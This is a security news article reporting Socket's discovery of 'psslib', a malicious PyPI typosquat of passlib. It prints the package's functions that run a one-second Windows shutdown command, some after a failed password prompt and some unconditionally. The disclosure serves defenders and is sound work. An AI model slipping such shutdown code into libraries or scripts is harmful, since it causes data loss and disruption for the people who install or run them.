Alert: Malicious Python Package “psslib” Typosquats passlib, Shuts Down Windows Systems

Socket’s Threat Research Team has uncovered a malicious Python package named psslib designed to abruptly shut down Windows systems under the guise of offering password security functionality.

The package—authored by a threat actor using the alias umaraq—is a typosquat of the legitimate passlib library, which is a widely used password hashing toolkit trusted by millions of developers.

“The malicious psslib package exploits this trust by representing itself as a security utility, while containing code that can cause immediate data loss and system disruption,” Socket reported.

The attack begins with a name trick: psslib closely resembles passlib, likely hoping to dupe developers who type quickly or rely on autocomplete. The passlib enjoys over 8.9 million monthly downloads.

“Socket’s AI Scanner flags psslib as malicious due to its destructive system shutdown behavior.”

Once imported and triggered by an incorrect password entry, psslib executes a Windows shutdown command (shutdown /s /t 1), causing the machine to power off within one second.

The package pretends to provide password protection through a function named spc() using easygui.enterbox() for user input. If the user input doesn’t match the preset value, it shuts the system down immediately.

def spc(password):
    # Malicious code: Forces immediate system shutdown on incorrect input
    if easygui.enterbox('enter password:-') != password:
        os.system("shutdown /s /t 1")  # Shutdown in 1 second

In addition to this, psslib includes two other functions—src() and error()—that shut down the system without any authentication at all.

def src():
    # Directly forces system shutdown without user input
    os.system("shutdown /s /t 1")

def error(message):
    # Writes an error message and forces system shutdown
    sys.stderr.write(message)
    os.system("shutdown /s /t 1")

These additional vectors ensure that even limited usage of the library could instantly compromise a developer’s machine, especially in environments running with elevated privileges.

Socket noted that this malware specifically targets Windows-based development environments, where shutdown commands are effective and frequently overlooked. While the payload fails harmlessly on Linux or macOS due to OS command differences, the package’s Windows-specific nature demonstrates targeted intent.

“The attack is fully effective. The shutdown command executes as intended, forcing an immediate system shutdown that can result in: loss of unsaved work and data, corruption of open files and databases, and disruption of running services.”

Related Posts:

• Widespread Outage: CrowdStrike Update Affects 8.5 Million Windows Users
• Typosquatting & Backdoors: Lazarus’ Latest npm Campaign
• Malicious Go Packages Target Developers with Hidden Loader Malware on Linux and macOS
• Iran Plunges into Near-Total Internet Blackout Amid Escalating Cyberwar with Israel